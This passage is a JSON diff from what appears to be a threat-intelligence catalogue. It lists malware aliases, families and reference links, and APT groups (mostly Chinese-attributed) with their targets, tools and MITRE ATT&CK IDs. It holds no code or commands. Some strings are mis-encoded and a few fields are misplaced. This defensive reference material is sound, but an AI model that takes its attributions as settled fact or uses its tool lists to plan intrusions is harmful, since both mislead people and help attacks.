"family": [ + "ZLob" + ], + "links": [ + "http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/" + ] + }, + { + "names": [ + "Comfoo", + "IEXPLORE RAT", + "Briba", + "Sharky RAT" + ], + "comments": null, + "family": [], + "links": [ + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99&tabid=2", + "https://www.secureworks.com/research/secrets-of-the-comfoo-masters", + "https://citizenlab.org/2012/09/citizen-lab-technical-brief-iexpl0re-rat/" + ] + }, + { + "names": [ + "LSB" + ], + "comments": null, + "family": [], + "links": [ + "https://github.com/RobinDavid/LSB-Steganography", + "http://ijact.org/volume3issue4/IJ0340004.pdf" + ] + }, + { + "names": [ + "LStudio", + "Elise", + "Emissary" + ], + "comments": null, + "family": [], + "links": [ + "http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/" + ] + }, + { + "names": [ + "MNKit", + "Tran Duy Linh", + "WingD" + ], + "comments": null, + "family": [], + "links": [ + "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + ] + }, + { + "names": [ + "Mivast", + "Photo", + "Derusbi", + "Shyape", + "Sakula (variant)" + ], + "comments": "Chinese Backdoor, Winnti", + "family": [ + "Derusbi" + ], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf", + "https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf" + ] + }, + { + "names": [ + "Epic", + "Tavdig", + "Wipbot" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Carbon Rootkit", + "Cobra", + "Snake Rootkit" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "Turla", + "Uroburos" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "HIGHNOON", + 
"Derusbi", + "Winnti (Network Driver Component)", + "Rbdoor" + ], + "comments": "P2P Backdoor, Driver loaded into memory", + "family": [], + "links": [ + "https://securelist.com/?s=winnti", + "http://blog.vsec.com.vn/apt/initial-winnti-analysis-against-vietnam-game-company.html#more-73" + ] + }, + { + "names": [ + "WCE", + "AceHash" + ], + "comments": "Password Dumper, PTH", + "family": [], + "links": [ + "http://www.ampliasecurity.com/research/windows-credentials-editor/" + ] + }, + { + "names": [ + "Mimikatz", + "Powerkatz" + ], + "comments": "Password Dumper, PTH, DCSync, SkeletonKey, Golden/Silver Tickets", + "family": [], + "links": [ + "https://github.com/gentilkiwi/mimikatz" + ] + }, + { + "names": [ + "HDRoot", + "HDD Rootkit" + ], + "comments": "Winnti / Axiom Group", + "family": [], + "links": [ + "http://williamshowalter.com/a-universal-windows-bootkit/" + ] + }, + { + "names": [ + "OrcaRAT", + "LeoUnica" + ], + "comments": "Found with Comfoo malware", + "family": [], + "links": [ + "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html", + "https://github.com/kbandla/APTnotes/blob/master/2014/LeoUncia_OrcaRat.pdf" + ] + }, + { + "names": [ + "Etumbot" + ], + "comments": "Assocaited with Numbered Panda/APT12", + "family": [], + "links": [ + "https://cysinfo.com/sx-2nd-meetup-reversing-and-decrypting-the-communications-of-apt-malware/", + "https://www.arbornetworks.com/blog/asert/illuminating-the-etumbot-apt-backdoor/" + ] + }, + { + "names": [ + "xcmd" + ], + "comments": "Similar to psexec. 
Used in OPM and Anthem breaches", + "family": [], + "links": [] + }, + { + "names": [ + "NjRAT" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "CHOPSTICK", + "Backdoor.SofacyX", + "SPLM", + "Fysbis", + "X-Agent" + ], + "comments": "Used by Sofacy group, Linux backdoor", + "family": [], + "links": [ + "http://www.welivesecurity.com/2016/10/25/lifting-lid-sednit-closer-look-software-uses/" + ] + }, + { + "names": [ + "AlienSpy", + "Frutas", + "Unrecom", + "jFrutas", + "jRAT", + "Adwind RAT", + "jSocket" + ], + "comments": null, + "family": [ + "Adwind" + ], + "links": [ + "https://t.co/x0jmdEp45w" + ] + }, + { + "names": [ + "Jiripbot", + "Flacher" + ], + "comments": "Wild Neutron", + "family": [], + "links": [] + }, + { + "names": [ + "Quasar RAT" + ], + "comments": null, + "family": [], + "links": [ + "https://github.com/quasar/QuasarRAT/tree/v1.2.0.0" + ] + }, + { + "names": [ + "Mtool", + "MultiTool" + ], + "comments": "Cn Group Tool for Recon", + "family": [], + "links": [] + }, + { + "names": [ + "Manuscrypt ", + "FallChill" + ], + "comments": "Backdoor. 
Used by Lazarus Group, Bluenoroff.", + "family": [], + "links": [ + "https://securelist.com/apt-trends-report-q2-2017/79332/" + ] + }, + { + "names": [ + "Infy M", + "Infy" + ], + "comments": null, + "family": [], + "links": [ + "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/" + ] + }, + { + "names": [ + "DustySky", + "NeD Worm" + ], + "comments": null, + "family": [], + "links": [ + "http://www.clearskysec.com/dustysky/" + ] + }, + { + "names": [ + "Exforel" + ], + "comments": "SIG30 in NSA report, Chinese origin", + "family": [], + "links": [ + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:WinNT/Exforel.A", + "https://blog.crysys.hu/2018/03/territorial-dispute-nsas-perspective-on-apt-landscape/" + ] + }, + { + "names": [ + "LoJax" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "ROKRAT" + ], + "comments": null, + "family": [], + "links": [ + "http://v3lo.tistory.com/24", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + ] + }, + { + "names": [ + "Hermes", + "Ryuk" + ], + "comments": "Ryuk based on Hermes GRIM SPIDER (cybercrime)", + "family": [], + "links": [ + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/", + "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-exploring-the-human-connection/", + "https://blog.kryptoslogic.com/malware/2019/01/10/dprk-emotet.html" + ] + }, + { + "names": [ + "XAP", + "X-Tunnel", + "Xtunnel", + "Shunnael" + ], + "comments": "Used by APT28 / Sofacy, A family of modular backdoors with Windows, Linux, and iOS variants. 
The malware,which includes espionage functionalities like keystroke logging and file exfiltration, is typically dropped after a reconnaissance phase as second-stage malware.", + "family": [], + "links": [] + }, + { + "names": [ + "Flame", + "Flamer", + "sKyWIper" + ], + "comments": "Used by GOSSIPGIRL (umbrella group)", + "family": [], + "links": [ + "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0" + ] + }, + { + "names": [ + "Zekapab", + "Zebrocy" + ], + "comments": "A multilanguage family of modular downloaders, droppers, and backdoors deriving from Delphocy", + "family": [], + "links": [] + }, + { + "names": [ + "Sednit", + "JKEYSKW", + "SofacyCarberp", + "JHUHUGIT", + "SeduUploader" + ], + "comments": "A first-stage downloader based on the Carberp banking Trojan. It serves as reconnaissance malware and can download a secondary backdoor such as XAgent", + "family": [], + "links": [] + }, + { + "names": [ + "Sofacy", + "SOURFACE" + ], + "comments": "A first-stage downloader that retrieves a second stage backdoor from a command-and-control server", + "family": [], + "links": [] + }, + { + "names": [ + "BE", + "BlackEnergy" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "BE2", + "BlackEnergy2 " + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "GreyEnergy Mini", + "FELIXROOT" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [ + "CrashOverride", + "Industroyer" + ], + "comments": "A modular malware designed to disrupt ICS processes in electrical substations. Industroyer consists of an initial backdoor, loader module, and several supporting and payload modules. 
The malware also includes a data wiper and a denial of service (DoS) tool targeted at Siemens SIPROTEC protection relays.", + "family": [], + "links": [] + }, + { + "names": [ + "GoldenEye", + "NotPetya", + "ExPetr", + "Diskcoder.C", + "Nyetya" + ], + "comments": null, + "family": [], + "links": [] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://github.com/kbandla/APTnotes" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://aptnotes.malwareconfig.com/" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://apt.securelist.com/" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "http://cybercampaigns.net/" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "http://www.slideshare.net/Cyphort/cyber-espionage-nation-stateaptattacksontherise" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "http://www.crowdstrike.com/blog/" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://securelist.com/" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://www.cfr.org/interactive/cyber-operations" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://www.symantec.com/content/dam/symantec/docs/reports/istr-healthcare-2017-en.pdf" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://www.fireeye.com/current-threats/apt-groups.html" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://attack.mitre.org/wiki/Groups" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + 
"https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://dragos.com/adversaries.html" + ] + }, + { + "names": [], + "comments": null, + "family": [], + "links": [ + "https://docs.google.com/document/u/1/d/e/2PACX-1vR2TWm68bLidO3e2X0wTCqs0609vo5RXB85f6VL_Zm79wtTK59xADKh6MG0G7hSBZi8cPOiQVWAIie0/pub" + ] + } + ], + "actors": [ + { + "country": "china", + "names": [ + "TG-8223", + "GIF89a, ShadyRAT, Shanghai Group, Byzantine Candor", + "PLA Unit 61398", + "APT1", + "Comment Panda", + "BrownFox", + "Comment Crew" + ], + "targets": [ + "U.S. cybersecurity firm Mandiant, later purchased by FireEye, released a report in February 2013 that exposed one of China's cyber espionage units, Unit 61398. The group, which FireEye called APT1, is a unit within China's People's Liberation Army (PLA) that has been linked to a wide range of cyber operations targeting U.S. private sector entities for espionage purposes. The comprehensive report detailed evidence connecting APT1 and the PLA, offered insight into APT1's operational malware and methodologies, and provided timelines of the espionage it conducted." 
+ ], + "operations": [ + "GhostNet" + ], + "description": null, + "tools": [ + "WEBC2", + "BISCUIT and many others" + ], + "links": [ + "http://www.nytimes.com/2013/02/19/technology/chinas-army-is-seen-as-tied-to-hacking-against-us.html?emc=na&_r=2&", + "http://www.nartv.org/mirror/ghostnet.pdf", + "https://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network", + "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators", + "http://www.mcafee.com/us/resources/white-papers/wp-operation-shady-rat.pdf" + ], + "attck_id": "G0006", + "comment": null + }, + { + "country": "china", + "names": [ + "Putter Panda", + "APT2", + "PLA Unit 61486", + "SearchFire", + "TG-6952" + ], + "targets": [ + "This threat actor targets firms in the technology (communications, space, aerospace), research, defense, and government sectors in the United States for espionage purposes. The tools and infrastructure it uses overlap with PLA Unit 61398." + ], + "operations": [], + "description": null, + "tools": [ + "Their activities are commonly known to be exploiting CVE-2012-0158 (MSOffice vulnerability in MSCOMCTL.OCX) in SpearPhising operations. Related malware: Moose", + "Warp", + "MSUpdater" + ], + "links": [ + "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "http://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/" + ], + "attck_id": "G0024", + "comment": null + }, + { + "country": "china", + "names": [ + "Boyusec \u00e2\u0080\u0093 the Guangzhou Boyu Information Technology Company, Ltd", + "Gothic Panda", + "APT3", + "UPS Team", + "Buckeye", + "UPS", + "TG-0110" + ], + "targets": [ + "This threat actor targets and compromises entities in the defense, construction, technology, and transportation sectors. Up until 2015, it was primarily focused on U.S. 
and UK entities, but it shifted to Hong Kong\u00c3\u00a2\u00e2\u0082\u00ac\u00e2\u0080\u009cbased targets afterward. Aerospace and Defence; Construction and Engineering; Energy; High Tech; Nonprofit; Telecommunications; Transportation" + ], + "operations": [ + "Double Tap", + "Clandestine Wolf" + ], + "description": null, + "tools": [ + "Filensfer", + "Shadow Brokers exploits", + "Bemstour", + "Kaba", + "Pirpi", + "SportLoader", + "Shotput", + "Cookie Cutter", + "DoublePulsar", + "and Flash", + "many 0days: IE", + "Firefox", + "PlugX/Sogu" + ], + "links": [ + "https://www.fireeye.com/current-threats/apt-groups.html", + "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/", + "http://freebeacon.com/national-security/u-s-indicts-three-chinese-hackers-linked-security-firm/amp/", + "https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html", + "http://www.secureworks.com/resources/blog/research/threat-group-0110-targets-manufacturing-and-financial-organizations-via-phishing/", + "https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.recordedfuture.com/chinese-mss-behind-apt3/", + "https://www.washingtonpost.com/world/national-security/china-hacked-a-navy-contractor-and-secured-a-trove-of-highly-sensitive-data-on-submarine-warfare/2018/06/08/6cc396fa-68e6-11e8-bea7-c8eb28bc52b1_story.html?noredirect=on&utm_term=.209df584e031", + "https://intrusiontruth.wordpress.com/2018/05/22/the-destruction-of-apt3/" + ], + "attck_id": "G0022", + "comment": null + }, + { + "country": "china", + "names": [ + "Calc Team", + "Numbered Panda", + "IXESHE", + "BeeBus", + "APT12", + "TG-2754 (tentative)", + "DynCalc, Crimson Iron, DNSCalc" + ], + "targets": [ + "This threat actor targets organizations in Japan, Taiwan, and elsewhere in East 
Asia\u00c3\u00a2\u00e2\u0082\u00ac\u00e2\u0080\u009dincluding electronics manufacturers and telecommunications companies\u00c3\u00a2\u00e2\u0082\u00ac\u00e2\u0080\u009dfor espionage purposes." + ], + "operations": [], + "description": null, + "tools": [ + "Mswab", + "3001", + "Waterspout", + "ShowNews", + "Riptide", + "Etumbot", + "ThreeByte", + "Gh0st", + "Hightide" + ], + "links": [ + "http://blog.crowdstrike.com/whois-numbered-panda/", + "http://www.secureworks.com/cyber-threat-intelligence/threats/analysis-of-dhs-nccic-indicators/", + "http://www.computerworld.com/s/article/9241577/The_Chinese_hacker_group_that_hit_the_N.Y._Times_is_back_with_updated_tools?taxonomyId=17", + "http://blog.macnica.net/blog/2017/08/post-fb81.html", + "http://www.crowdstrike.com/blog/whois-numbered-panda/", + "http://www.arbornetworks.com/asert/2014/06/illuminating-the-etumbot-apt-backdoor/", + "https://cysinfo.com/sx-2nd-meetup-reversing-and-decrypting-the-communications-of-apt-malware/", + "http://blog.trendmicro.com/taking-a-bite-out-of-ixeshe/" + ], + "attck_id": "G0005", + "comment": null + }, + { + "country": "china", + "names": [ + "APT16" + ], + "targets": [ + "This threat actor targets and compromises Japanese and Taiwanese entities in the finance, tech, media, and government sectors." + ], + "operations": [], + "description": "Spear phishing email delivering a malicious Microsoft Word document exploiting EPS dict copy use-after-free vulnerability, and the local Windows privilege escalation vulnerability CVE-2015-1701. The successful exploitation of both vulnerabilities led to the delivery of either a downloader (IRONHALO), or a backdoor (ELMER). Also known to be using compromised VPN credentials to maintain network persistency. 
", + "tools": [ + "HTRAN", + "UNICAT", + "ELMER backdoor", + "Gh0st", + "Pandora", + "Poison Ivy" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/", + "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html", + "https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/" + ], + "attck_id": "G0023", + "comment": null + }, + { + "country": "china", + "names": [ + "https://401trg.com/burning-umbrella/", + "Aurora Panda", + "Hidden Lynx", + "Deputy Dog", + "Tailgater Team", + "APT17" + ], + "targets": [ + "Government, defense & aerospace, industrial engineering, NGOs" + ], + "operations": [], + "description": null, + "tools": [ + "ZxShell", + "Backdoor.Moudoor", + "Trojan.Hydraq", + "Sakula", + "Backdoor.Vasport", + "Backdoor.Boda", + "PlugX", + "Trojan.Naid", + "Joy RAT", + "BLACKCOFFEE", + "DestroyRAT", + "China Chopper", + "WEBCnC" + ], + "links": [ + "http://www.darkreading.com/attacks-and-breaches/chinese--hidden-lynx--hackers-launch-widespread-apt-attacks/d/d-id/1111589?page_number=2", + "http://www.crowdstrike.com/blog/french-connection-french-aerospace-focused-cve-2014-0322-attack-shares-similarities-2012/", + "https://www.infosecurity-magazine.com/news/chinese-espionage-group-widescale/", + "https://intrusiontruth.wordpress.com/2019/07/24/apt17-is-run-by-the-jinan-bureau-of-the-chinese-ministry-of-state-security/", + "http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html", + "https://401trg.com/burning-umbrella/", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/hidden_lynx.pdf", + "http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", + 
"https://www.bloomberg.com/features/2021-supermicro/", + "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf" + ], + "attck_id": "G0025", + "comment": null + }, + { + "country": "china", + "names": [ + "Dynamite Panda", + "TA428", + "Wekby", + "APT18", + "TG-0416" + ], + "targets": [ + "Aerospace and Defence; Construction and Engineering; Education; Health and Biotechnology; High Tech; Telecommunications; Transportation" + ], + "operations": [], + "description": null, + "tools": [ + "HTTPBrowser", + "TManger", + "PisLoader", + "HcdLoader", + "TokenControl" + ], + "links": [ + "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", + "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/", + "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem", + "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf", + "https://blog.group-ib.com/task", + "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger", + "https://www.recordedfuture.com/china-linked-ta428-threat-group/", + "https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2012/NormanShark-MaudiOperation.pdf", + "https://threatpost.com/apt-gang-branches-out-to-medical-espionage-in-community-health-breach/107828" + ], + "attck_id": "G0026", + "comment": null + }, + { + "country": "china", + "names": [ + "Dogfish (iDefense), Deputy Dog (iDefense), Winnti Umbrella", + "Tailgater Team", + "APT17", + "Axiom" + ], + "targets": [], + "operations": [], + 
"description": null, + "tools": [ + "Hikit", + "ZxShell", + "Timestomper", + "Derusbi", + "HDRoot", + "Fscan", + "PlugX", + "HTRAN", + "Winnti", + "HydraQ", + "Deputy Dog", + "PoisonIvy", + "Gh0st RAT" + ], + "links": [ + "https://securelist.com/analysis/publications/72275/i-am-hdroot-part-1/", + "http://www.novetta.com/2015/04/operation-smn-winnti-update/", + "https://401trg.com/burning-umbrella/", + "http://www.novetta.com/files/5614/1329/6232/novetta_cybersecurity_exec_summary-3.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/", + "http://securelist.com/blog/research/57585/winnti-faq-more-than-just-a-game/" + ], + "attck_id": "G0001", + "comment": "Use \"Skeleton Key\" on DCs" + }, + { + "country": "china", + "names": [ + "BRONZE ATLAS", + "APT41", + "Winnti Umbrella, BARIUM, LEAD, RedEcho, Vanadinite, TAG-22", + "Winnti Group", + "Wicked Panda" + ], + "targets": [ + "ThyssenKrupp, Gameforge, Valve, Teamviewer,Siemens, Sumitomo, BASF, Covestro, Shin-Etsu, Bayer, Roche" + ], + "operations": [], + "description": null, + "tools": [ + "Webshells", + "ZxShell", + "PlugX", + "Winnti", + "ShadowPad", + "AceHash" + ], + "links": [ + "https://lab52.io/blog/winnti-group-geostrategic-analysis-and-ttp/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware", + "https://401trg.com/burning-umbrella/", + "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/january/windows-firewall-hook-enumeration/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", + "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf", + "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", + 
"https://www.nccgroup.trust/globalassets/our-research/uk/technical-advisories/2015/derusbi-server-technical-note-1-1-tlp-white.pdf", + "https://web.br.de/interaktiv/winnti/index.html", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-vanadinite/" + ], + "attck_id": "G0044", + "comment": null + }, + { + "country": "china", + "names": [ + "Deep Panda", + "Sh3llCr3w, PinkPanther, Winnti Group", + "WebMasters", + "KungFu Kittens", + "Shell Crew", + "APT19" + ], + "targets": [], + "operations": [ + "Anthem Hack", + "OPM" + ], + "description": null, + "tools": [ + "Sakula/Sakurel", + "Derusbi", + "Scanbox Framework", + "WCE", + "many Webshells including China Chopper" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "http://cybercampaigns.net/wp-content/uploads/2013/06/Deep-Panda.pdf", + "https://www.isightpartners.com/2015/07/threatscape-media-highlights-update-week-of-july-29th/" + ], + "attck_id": "G0009", + "comment": null + }, + { + "country": "china", + "names": [ + "APT30", + "Naikon", + "Lotus Panda", + "PLA Unit 78020", + "Thrip" + ], + "targets": [ + "satellite communications operator, Telecoms, and Defense Companies, Hong Kong" + ], + "operations": [ + "Camera Shy", + "Naikon" + ], + "description": null, + "tools": [ + "RARSTONE", + "NETEAGLE", + "XSControl", + "BACKSPACe" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://www.symantec.com/blogs/threat-intelligence/thrip-apt-south-east-asia", + "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/", + "http://www.crowdstrike.com/blog/rhetoric-foreshadows-cyber-activity-in-the-south-china-sea/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/", + 
"https://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf?t=1443030820943&submissionGuid=407e0945-4acd-407c-8668-c5943f220e29", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf", + "https://www.threatconnect.com/camerashy/", + "https://cluster25.io/2022/04/29/lotus-panda-awake-last-strike/" + ], + "attck_id": "G0019", + "comment": null + }, + { + "country": "china", + "names": [ + "Spring Dragon", + "Lotus Blossom", + "ST Group, Esile" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Lstudio", + "CVE-2017-11882", + "Elise Backdoor" + ], + "links": [ + "http://www.trendmicro.com.my/vinfo/my/security/news/cyber-attacks/esile-targeted-attack-campaign-hits-apac-governments", + "http://researchcenter.paloaltonetworks.com/2015/06/operation-lotus-blossom/", + "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", + "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", + "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf", + "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/", + "https://community.rsa.com/community/products/netwitness/blog/2018/01/30/apt32-continues-asean-targeting", + "http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/" + ], + "attck_id": "G0030", + "comment": null + }, + { + "country": "china", + "names": [ + "APT6", + "1.php Group" + ], + "targets": [ + "US Government Organizations" + ], + "operations": [], + "description": null, + "tools": [ + "", + "Poison Ivy" + ], + "links": [ + 
"https://www.zscaler.com/blogs/research/1php-group-intrusion-set-paper", + "https://motherboard.vice.com/read/fbi-flash-alert-hacking-group-has-had-access-to-us-govt-files-for-years", + "https://www.zscaler.com/pdf/technicalbriefs/tb_advanced_persistent_threats.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/tb_advanced_persistent_threats.pdf" + ], + "attck_id": null, + "comment": "Overlaps with Operation Night Dragon" + }, + { + "country": "china", + "names": [ + "Hippo Team", + "APT26", + "JerseyMikes", + "Turbine Panda" + ], + "targets": [ + "Affected Industry: Aerospace and Defense, business and Professional Services/Legal/Accounting, High Tech Software and hardware services" + ], + "operations": [], + "description": "Supply-chain attacks such as strategic web compromise (SWC) where the actor compromise 3rd-party service provider hosting the victim websites", + "tools": [ + "GSECDUMP", + "SOGU", + "QUICKBALL", + "credential stealers such as WCE", + "COATHOOK", + "QuickPulse", + "HTRAN", + "TWOCHAINS", + "Cobalt" + ], + "links": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf?mkt_tok=3RkMMJWWfF9wsRojuKrPZKXonjHpfsX/7e8tWrHr08Yy0EZ5VunJEUWy2ocITtQ/cOedCQkZHblFnV4AS626XrENqKML", + "https://www.crowdstrike.com/resources/wp-content/brochures/reports/huge-fan-of-your-work-intelligence-report.pdf", + "https://digit.fyi/lengthy-cyber-espionage-operation-helped-china-develop-c919-airliner/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Social Network Team", + "Ke3Chang", + "Playful Dragon", + "Vixen Panda", + "Mirage", + "GREF", + "APT15", + "Mirage Team, Lurid, Social Network Team, Royal APT, Metushy, Winnti Umbrella, NICKEL" + ], + "targets": [ + "PH, VN, TW, US, UK, IT, PL, UN, SG, NATO - Gov, Political party" + ], + "operations": [], + "description": null, + "tools": [ + "CYFREE", + "RoyalCli", + "SOGU", + "Mirage", + "SWALLOWFLY", + "ENDCMD", + "iWebRat", + 
"Russian-language decoy document", + "NOISEMAKER", + "TidePool", + "MIRAGE", + "(Nvidia program side-loading) PlugX", + "BS2005", + "ENFAL", + "XSLCmd", + "QUICKHEAL" + ], + "links": [ + "https://github.com/nccgroup/Royal_APT", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", + "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html", + "https://401trg.com/burning-umbrella/", + "http://arstechnica.com/security/2015/04/elite-cyber-crime-group-strikes-back-after-attack-by-rival-apt-gang/", + "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi#page=51", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf" + ], + "attck_id": "G0004", + "comment": "Some vendors track this group in up to 3 separate groups" + }, + { + "country": "china", + "names": [ + "Lanzhou PLA Unit", + "APT21", + "NetTraveler" + ], + "targets": [ + "This threat actor targets computer networks associated with Tibetan and Uyghur activists for espionage purposes." 
+ ], + "operations": [], + "description": null, + "tools": [ + "NetTraveler" + ], + "links": [ + "https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/", + "https://securelist.com/blog/research/35936/nettraveler-is-running-red-star-apt-attacks-compromise-high-profile-victims/", + "https://securelist.com/blog/incidents/57455/nettraveler-is-back-the-red-star-apt-returns-with-new-tricks/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Ice Fog", + "ICEFOG", + "Fucobha, Temp.Trident", + "IceFog", + "Dagger Panda" + ], + "targets": [ + "This threat actor targets government institutions, military contractors, maritime and shipbuilding groups, telecommunications operators, and others, primarily in US, Taiwan, Japan and South Korea." + ], + "operations": [], + "description": null, + "tools": [ + "RoyalRoad RTF Weaponizer", + "Dagger Three (C2 software)", + "Fucobha Backdoor", + "IceFog" + ], + "links": [ + "https://securelist.com/blog/research/57331/the-icefog-apt-a-tale-of-cloak-and-three-daggers/", + 